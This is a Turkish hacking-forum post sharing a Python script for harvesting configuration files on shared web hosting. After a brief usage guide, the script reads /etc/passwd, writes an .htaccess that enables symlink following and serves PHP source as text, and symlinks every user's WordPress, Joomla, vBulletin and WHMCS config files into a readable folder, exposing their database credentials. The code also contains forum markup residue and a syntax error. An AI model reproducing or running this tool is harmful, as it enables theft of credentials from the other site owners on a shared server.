Onaylı Üye
Selamlar MemoryHackers Takipçileri ve değerli üyeleri, bugün sizlerle kendi kodlamış olduğum bir tools ile sunucuyu bypass etmeyi sunucudaki wordpress,joomla,vbullettin vb alt yapıyı kullanan sitelerin config bilgilerine ulaşmayı deneyeceğiz.
Şimdi arkadaşlar, Mantık daha önceki port hacking konum ile aynı mantıkla tak çalıştır mantığı,
Tools'umuzu bir dızine upload edelim ben /home/kullanıcı/public_html/upload/mh.py dizinine upload ettiğinizi upload ettiğinizi sayıyorum.
Şimdi Execute yani komut çalıştır kısmına, mh.py yazım çalıştırıyoruz..
Şimdi arkadaşlar, Mantık daha önceki port hacking konum ile aynı mantıkla tak çalıştır mantığı,
Tools'umuzu bir dızine upload edelim ben /home/kullanıcı/public_html/upload/mh.py dizinine upload ettiğinizi upload ettiğinizi sayıyorum.
Şimdi Execute yani komut çalıştır kısmına, mh.py yazım çalıştırıyoruz..
Kod:
#############################################[/B][/CENTER]
[B][CENTER]# Hacked by Zer0day/ MemoryHackers.org #
# config cekme araci #
# kullanimi = python mh.py #
#############################################"""
Configler /MemoryH/ klasoru icindedir."Karşımıza böyle bir print geldi bu ne anlama geliyor? GREAT Yani başarılı işlem, tools sunucudaki sunucuların configlerini yeni bir klasör açıp o klasöre yetki verip, içine yazdırmayı başardık kodları sizlerle paylaşıyorum umarım yararı olur..
Kod:
#coding:utf-8[/B][/CENTER]
[B][CENTER]import os
import sys
print """
#############################################
# Hacked by Zer0day / MemoryHackers.org #
# config cekme araci #
# kullanimi = python mh.py #
#############################################"""
user=[]
kontrol= os.path.exists("/etc/passwd")
if kontrol ==True:
os.system("rm -rf dexmodconf")
etc=open("/etc/passwd","r").readlines()
os.mkdir("MemoryHackers)
kgec=os.getcwd()
gec=kgec+"/MemoryHackers"
os.chdir(gec)
ht="""Options Indexes FollowSymLinks
DirectoryIndex achon666ju5t.extremecrew
AddType txt .php
AddHandler txt .php"""
htyaz=open(".htaccess","w+")
htyaz.write(ht)
htyaz.close()
for i in etc:
dzn=i.split(":")
user.append(dzn[0])
for usr in user:
komut="ln -s "
dizinler="/home/%s/public_html/"%(usr)
wp="%s-wordpress.txt"%(usr)
wp1="%s-wordpress1.txt"%(usr)
jo="%s-joomla.txt"%(usr)
jo1="%s-joomla1.txt"%(usr)
vb="%s-vbulletin.txt"%(usr)
vb1="%s-vbulletin1.txt"%(usr)
whm="%s-whmcon.txt"%(usr)
whmc="%s-whmccon.txt"%(usr)
conf="%s-config.txt"%(usr)
conf1="%s-config1.txt"%(usr)
conf2="%s-config2.txt"%(usr)
conf3="%s-config3.txt"%(usr)
conf4="%s-config4.txt"%(usr)
conf5="%s-config5.txt"%(usr)
conf6="%s-config6.txt"%(usr)
conf7="%s-config7.txt"%(usr)
conf8="%s-config8.txt"%(usr)
conf9="%s-config9.txt"%(usr)
conf10="%s-config10.txt"%(usr)
conf11="%s-config11.txt"%(usr)
configler=["vb/includes/config.php %s"%(vb),"includes/config.php %s"%(vb1),"config.php %s"%(conf),"forum/includes/config.php %s"%(conf1),"admin/conf.php %s"%(conf2),"admin/config.php %s"%(conf3),"wp-config.php %s"%(wp),"blog/wp-config.php %s"%(wp1),"conf_global.php %s"%(conf4),"include/db.php %s"%(conf5),"connect.php %s"%(conf6),"mk_conf.php %s"%(conf7),"configuration.php %s"%(jo),"include/config.php %s"%(conf8),"joomla/configuration.php %s"%(jo1),"whmc/configuration.php %s"%(whmc),"support/configuration.php %s"%(conf9),"inc/db.php %s"%(conf10),"db.php %s"%(conf11),"whm/configuration.php %s"%(whm)]
for i in configler:
kmt=komut+dizinler+i
os.system(kmt)
print "Configler /MemoryHackers/ klasoru icindedirr.